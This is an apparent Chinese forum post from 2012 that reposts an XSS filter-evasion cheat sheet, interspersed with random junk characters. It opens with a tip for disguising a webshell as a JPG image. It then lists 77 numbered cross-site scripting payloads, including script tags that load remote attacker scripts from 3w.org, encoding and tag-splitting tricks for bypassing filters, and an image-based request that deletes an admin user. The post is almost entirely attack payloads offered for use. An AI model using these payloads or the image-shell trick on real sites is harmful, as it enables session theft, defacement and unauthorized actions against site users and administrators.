跨站图片shell
1 B0 @# B: @/ q- h" o5 e; XXSS跨站代码 <script>alert("")</script>/ j) p. C) r& t$ y, X4 z2 O; {
$ k5 V$ N0 s5 _将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
& a' h3 p) k8 a O
" Y0 |7 c! x4 ^; A1 @. x3 i6 d2 f: h# S7 n! ~% a, S
' {7 s1 Z- W b, P7 V2 I- T, @
1)普通的XSS JavaScript注入3 |9 Y$ |% Y. H/ z5 n- }$ _
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- ?- q) O% ?/ x7 _5 e' C, x
# E" J2 i5 P u1 q(2)IMG标签XSS使用JavaScript命令
$ n _; v1 O- S9 S( d5 n, b* N<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 }3 o% l: K! C+ [4 r# }1 |# A
t1 j0 L& o3 M- j(3)IMG标签无分号无引号 E! ?' ]/ f V
<IMG SRC=javascript:alert(‘XSS’)>. g9 K( A' H& y; k. W
5 d; X5 i# S' M9 g3 i(4)IMG标签大小写不敏感
: u$ F1 ]/ r0 Z v' Z9 I<IMG SRC=JaVaScRiPt:alert(‘XSS’)>) A4 J8 h) O6 K- Q% S
4 \( r4 f. ?# L9 l" ?0 O: ^
(5)HTML编码(必须有分号)
; M& T& q0 r2 M; z" @8 x& z- }: o$ s<IMG SRC=javascript:alert(“XSS”)>
8 s; ^( q) y: B9 t1 l1 t( F: n2 K& I5 u0 J( u, ]* a9 S' N
(6)修正缺陷IMG标签
/ _$ f% w* u9 F<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>) b2 s0 T3 {1 d9 n
* c9 w2 B0 G q0 r7 r% W
(7)formCharCode标签(计算器) ^5 }: x) M& e3 C* u' C# O
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>5 _9 Z' t1 T$ Q& z- K
9 J# M, t2 }6 \* n
(8)UTF-8的Unicode编码(计算器)
7 @ p$ X4 A% n' U2 s9 v3 Z<IMG SRC=jav..省略..S')>! f1 j5 O5 u2 s8 V
: k5 v* C7 a* p# O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 I- u6 r# p7 u
<IMG SRC=jav..省略..S')>
K/ `% j; q7 c% _, a p- m( E, c7 G, R* @0 v) M, X# M
(10)十六进制编码也是没有分号(计算器) v; i& M: v" x' k3 R7 u; ~
<IMG SRC=java..省略..XSS')>1 M" J _$ N {3 b" u
]# ^# x c! O0 l2 n! d, S% E(11)嵌入式标签,将Javascript分开
5 M0 v5 _( Z1 h- \<IMG SRC=”jav ascript:alert(‘XSS’);”>/ @; V& Q) k9 a: D
$ E) o0 D5 G1 E3 N7 F& y1 o5 J
(12)嵌入式编码标签,将Javascript分开" F# {* k+ ?3 O' h& l; f* N) g
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 m% b U: m) E! t' c2 c- L0 q
+ t: i7 ^5 w; w% _(13)嵌入式换行符
) O$ K* g' P. E2 q. v/ K. d& s<IMG SRC=”jav ascript:alert(‘XSS’);”>
c: X, ]4 k) H& Z) a/ Y1 k, B: B
( f8 n9 M, v* {0 k(14)嵌入式回车. I) f3 h" D/ b2 ~0 w7 R
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 {9 {# f. ^% ^$ Y
3 j4 J: Q; k; I; b
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 m& L- h3 P+ O4 m/ A6 F# ~+ V<IMG SRC=”javascript:alert(‘XSS‘)”>
2 {0 r% }( Z, H# I' N3 p( i$ I
Y9 `1 Y; s! z- O# w H(16)解决限制字符(要求同页面)2 T+ K) z9 J- ~# v1 S* f
<script>z=’document.’</script>
& B5 N- J) o* O<script>z=z+’write(“‘</script>7 K( E" [4 K4 }1 S X$ S
<script>z=z+’<script’</script># |1 s# f3 O- k1 D- O
<script>z=z+’ src=ht’</script>
4 p& P( j, q! ]: D, ]: ^<script>z=z+’tp://ww’</script>' b& ~) H h! K h h- Q7 I
<script>z=z+’w.shell’</script>. w% l& V5 c0 C! a/ r( J
<script>z=z+’.net/1.’</script>
]7 C2 B. k2 s0 L& \/ `<script>z=z+’js></sc’</script>
: n3 w) B' m( ~<script>z=z+’ript>”)’</script>4 R5 i& ]+ e& \
<script>eval_r(z)</script>- {# j+ ?( S3 W7 r
7 J/ Y( t3 K( x4 p(17)空字符8 E9 ?# m6 d/ G- t
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out0 ^" E; H- [* V0 t) _$ Q7 E
- T- r% U7 L5 b6 n' _1 r( b( t; R(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用& W5 A4 z' W. g8 O3 k
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out; b1 O& M8 ~ v6 v3 P
0 o" ^2 F4 a' P8 U( [; I. O5 Z(19)Spaces和meta前的IMG标签
# V3 N1 L- u3 Y' N( u3 a<IMG SRC=” javascript:alert(‘XSS’);”>( |1 c$ t3 |) ~" } ^4 Y; u; L
2 ~! X3 i+ k8 f% c; K. W0 E, q(20)Non-alpha-non-digit XSS* C. P: s5 e, Y- f. P
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) Q" Y; Z; j# r3 s. i
7 ^: m# N, |+ O$ y% }; ~
(21)Non-alpha-non-digit XSS to 2$ c: l4 H* k) H
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)># f/ Z/ g& W. d9 G
8 l7 e& J" P, n$ `# N) z
(22)Non-alpha-non-digit XSS to 3
. H' d8 }, |( s3 g" @/ U<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% l0 W, M3 V3 l
2 |' N3 g0 b1 T. p3 Z. V(23)双开括号8 i. }5 x/ F; `/ d2 Y
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 L: ]- `4 s2 l) B; J9 f% r) d( G9 Q% O" `) J0 c
(24)无结束脚本标记(仅火狐等浏览器); K. q8 _7 p/ l% R
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
+ }7 i3 t3 e8 j" }3 O+ Q+ @& y, Y( ~0 {
(25)无结束脚本标记2
7 [4 [/ p2 D! H% c2 o<SCRIPT SRC=//3w.org/XSS/xss.js>4 q: d5 ]; E- B- n( Q2 D& F
/ g" J# H1 j) Z2 J3 C. Y
(26)半开的HTML/JavaScript XSS
3 G% P& ^4 Q# ]% O<IMG SRC=”javascript:alert(‘XSS’)”4 {- p$ |& u3 ]+ q0 x7 {
2 R1 h4 X& o, o( q2 @
(27)双开角括号
6 z# N. t& c5 W1 M. N6 C<iframe src=http://3w.org/XSS.html < c8 M# i0 r: x4 x
/ y# _, _7 c$ w- A% @. d
(28)无单引号 双引号 分号
" h1 u( K0 P0 @8 {<SCRIPT>a=/XSS/) A5 N5 [* l+ m- @
alert(a.source)</SCRIPT>0 E1 e6 k. l2 m* M* ?" D
8 A x, y) S7 h4 \; F(29)换码过滤的JavaScript
. ^: ]0 u. b3 I\”;alert(‘XSS’);//
! V& O: ` ]& C- K' I/ h
1 n u9 m$ r9 n$ d6 {) Y0 q4 H(30)结束Title标签
3 U1 U+ W" `4 h/ g0 M! W</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 a) Y% J6 k7 J) j; @/ n" F
- _2 |/ W/ \ Y8 i3 _. i: _(31)Input Image
9 x0 f6 }. U% V6 U: Q: D5 V<INPUT SRC=”javascript:alert(‘XSS’);”>- u, |' e8 O: k- o3 b
' }1 g+ x- p2 q- V, O(32)BODY Image9 p' b& ?) i# R% {, d
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 Y4 s$ @' r* H" @( J4 {; s5 n; v* s1 V3 ^5 r( P
(33)BODY标签
1 U8 N) l7 @$ I4 M, V: I/ b<BODY(‘XSS’)>
' n& Y/ p0 O7 n& {' Q
- }8 F, U5 O" B5 L' ](34)IMG Dynsrc. ?5 n+ b0 \9 d$ P' |+ T$ T0 Y/ h
<IMG DYNSRC=”javascript:alert(‘XSS’)”>* }9 w4 ~( s: r/ U( i( s& L( m
2 j! m1 }% M& h1 \1 g1 n# F% ?- Q
(35)IMG Lowsrc
" C- B* T/ v" Y C<IMG LOWSRC=”javascript:alert(‘XSS’)”># v* @6 c# F3 L# T! F
) Z3 f3 S8 A) c' |! ~7 g(36)BGSOUND: ^1 ?) Q7 M. N' _2 Q6 B
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" }) F$ @2 o8 l% M& K7 }5 S; x' X3 \5 z0 ^
(37)STYLE sheet3 p0 t% \9 S1 {7 P! g1 X$ ^
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% H2 k; J z) o& i) N4 z$ }$ f
( v+ m: l6 g) ~) ?( t; L
(38)远程样式表
6 U; t# f4 X7 R* a<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
, `, W3 }9 p$ N4 x, N6 ~
7 S9 L3 s& _" Y) x' w+ F(39)List-style-image(列表式)4 K" i/ L" P( j. u# l
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 u6 e, c5 E. [8 l" g1 I' V
+ a$ Z+ B" a# D* `1 t(40)IMG VBscript( }0 I( p: e9 Z4 K0 r% c" [) b: ?6 s
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# r2 a! i- Z2 ~! e/ n8 h
# l( _2 r8 U6 T$ N V/ a# ]$ L(41)META链接url
* I: l# r& H! J<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
4 @* j' h& e+ }4 f: A% {* F- @
5 t( @# v1 f' W" v* j+ }(42)Iframe* E& `9 X( b9 d# |+ Z/ s5 P" O
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
8 {' l0 r6 W' H7 _(43)Frame/ w& {( l# z3 O3 P& {& t, J
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>8 U( n. u- p$ Y. ^1 Q+ x
6 a& W" ~7 K6 T% }+ ?(44)Table
7 c6 z' n% d @5 U4 k' x<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>" `3 b. c; g0 b+ ?5 k( H1 p
$ f$ J, F* F/ B* m: x) b- m4 J$ c(45)TD2 ?( |9 V) c* T2 |( T& G
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, }2 T9 Y- `3 p# m c: d" x) P) j) H
(46)DIV background-image7 W' y& q0 d9 }- K/ D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
0 P6 x# R% O( ]( T; T' a& P( L _4 D4 U9 M6 ~# @
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)( I+ Q- i) H: J: J
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
+ J5 A' [, g. A7 n: u$ \. d, W0 t1 S& V- |
(48)DIV expression# Q, w6 Z1 L2 y, J# q* b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
1 x1 F& F6 i1 `/ e4 p. O; S# o; [" _3 O; \, F. C# v! L
(49)STYLE属性分拆表达; F& \: j" g9 T" ]. S' v4 ]2 m
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: p$ q+ o' |, |. ]; h8 v
0 }# V3 _4 A! K! O! }* p; _(50)匿名STYLE(组成:开角号和一个字母开头)
U; H8 C/ M6 C. k) s<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, Q) `; `5 |6 Y/ c/ C( r
! p" L7 D4 J `1 i1 A. {$ M/ n2 _) Z(51)STYLE background-image2 L, u0 y4 O) j" ]: A8 }6 K; ~
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
3 d: a- |4 v( I d Z$ m/ E6 _$ @! K ~, a
(52)IMG STYLE方式
* Q) X; B1 k* p/ ~exppression(alert(“XSS”))’>
2 `% B- ^% s* x d! U
$ c7 q% R# n) ^7 v- P0 V(53)STYLE background, q! Y& u4 b r$ R" k
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
2 D S' A+ A8 Y7 {3 p( T
y: }6 i# {: C8 ?6 H* V" N(54)BASE
; b9 n; x. Q! G( D6 p<BASE HREF=”javascript:alert(‘XSS’);//”>
8 C5 t, Q, N. C; i$ z
! {. H8 m1 h7 U7 u( U2 r9 R(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
0 _4 y# H ~- |<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 A+ J; a5 Q3 K' [5 n
0 Q5 r$ @" f: F( C2 ~% y( [" b
(56)在flash中使用ActionScrpt可以混进你XSS的代码
/ P' d- s# b/ J2 j p! Q9 ha=”get”;
; y. L: r$ ^* e' B& Ob=”URL(\”";1 M4 [" B9 l& P
c=”javascript:”;
4 | z# W- U0 r# Wd=”alert(‘XSS’);\”)”;2 m3 G, B# J# l. ^' {5 i5 F+ E; L1 b
eval_r(a+b+c+d);& f) \% m7 ^- ^0 D$ V
/ _% w$ [* a+ U- x6 z(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( a8 ^, G; u) q0 Z4 j<HTML xmlns:xss>: m! ]) M/ ^4 a1 M& P
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ j6 y4 ]! v& X. L" ?<xss:xss>XSS</xss:xss>. g' f9 r4 ]: J
</HTML>- G ~: l9 b; d
% Z/ X4 u# S9 S1 R5 ?6 H(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; L* h8 f8 G! n# {/ R( v<SCRIPT SRC=””></SCRIPT>
1 Y; f. I9 G, w1 L; Q3 l# r6 W$ Y! ]. t& d: \* G% Y) W
(59)IMG嵌入式命令,可执行任意命令
, y, w" e4 y& ?, N8 C+ s# S+ P<IMG SRC=”http://www.XXX.com/a.php?a=b”>! ~1 s6 D6 y3 u% {2 l
8 k) l0 r6 b" w! {(60)IMG嵌入式命令(a.jpg在同服务器)7 S/ p3 D4 F- t# y4 }, I% q
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser: c. F2 R" u- M2 y
; `7 d+ K) o H) h6 c* ?
(61)绕符号过滤
, t5 i2 R- F- |' Y/ w7 K<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>: B1 i8 d" t( C: k0 b1 a
O5 [. Y& c( Y) X+ B5 [! T
(62)
) i: Q: B$ n2 n<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* ^$ @. M: }) y% @4 R! X6 W" g
9 q8 B' |& Z; c' [+ J* o* T$ I+ h
(63)$ \; s5 k' H- z* ?' o: U1 }
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 g+ V% N$ j- s: P
' n7 u Z3 ?. o8 _+ [ G(64)
" w% s+ r2 H4 t: Q: T q<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 h @+ H! q* s4 t
2 O( z2 K" ?, F. N$ {# R7 v
(65)
: f3 D9 X: w7 i( W! |<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
) P. O/ i( @% z" |4 ~5 n- w- a
4 G# ~$ j- Z1 r! J. C1 ^( d' P(66)% @+ M' y$ B! |% |
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 V% E; U6 j, o" f% @2 b1 T+ T0 c! p) A* s. z* W
(67)
9 m9 ]& R* m, ~$ Y$ y<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
7 n o1 m$ A% J" w) r4 `
* d+ J1 X+ u8 T/ a# F' ]4 g(68)URL绕行
, N0 c" T- D; A& {<A HREF=”http://127.0.0.1/”>XSS</A>+ Q8 P- v$ n, V- M2 k
( n1 o( g$ i1 j5 }+ y% i0 J(69)URL编码
4 k: l6 A% i- V6 Q3 O9 R2 c3 f8 E+ S/ U<A HREF=”http://3w.org”>XSS</A>; |* y! P2 V" K( Q9 i, a: I
8 B* X" j+ t5 I# L: E2 d
(70)IP十进制
- T4 g( b2 U7 h0 F+ j# D$ E<A HREF=”http://3232235521″>XSS</A>5 X/ t2 d1 g1 ^' I
. t, b" v3 C& U: I7 C5 Y(71)IP十六进制+ z- x; f" {% I8 o
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 p; T8 O8 X: t
" B! o" m6 U: U1 J/ b(72)IP八进制0 i. s+ C" ~$ E$ r3 q' x* ^- G# u+ u
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
* D) _% l+ D& |0 R
6 y& U) d1 l% k3 k, C(73)混合编码' ?3 ~. h; E, k& O/ g0 e6 R
<A HREF=”h! o' d8 y- X* a+ I9 O7 `5 S0 I4 I ~6 G5 m
tt p://6 6.000146.0×7.147/”">XSS</A>
( @ x1 Q3 r; @, ?! }8 H, C5 H9 \1 \, t6 y$ D' r3 L
(74)节省[http:]
; [0 V4 d9 z0 q; V$ D5 U<A HREF=”//www.google.com/”>XSS</A>
% e( e3 `/ T+ K) e1 W( ?3 p" |, b. u
(75)节省[www]" N+ P" @; M. I" s' {
<A HREF=”http://google.com/”>XSS</A>3 x( o, I& G5 }6 w
) i) x/ X% ]0 F. ^4 d(76)绝对点绝对DNS- a% V! p. T. b8 T" j- G
<A HREF=”http://www.google.com./”>XSS</A>
5 X3 E, m Q K) H
! T% Q4 q" a8 g6 k# c0 I* j(77)javascript链接$ ` e. v9 ?0 N& W+ T
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>" M8 ~* ^+ d0 Q/ P1 ? }
|
发表于 2012-9-13 17:04:56
收藏
支持
反对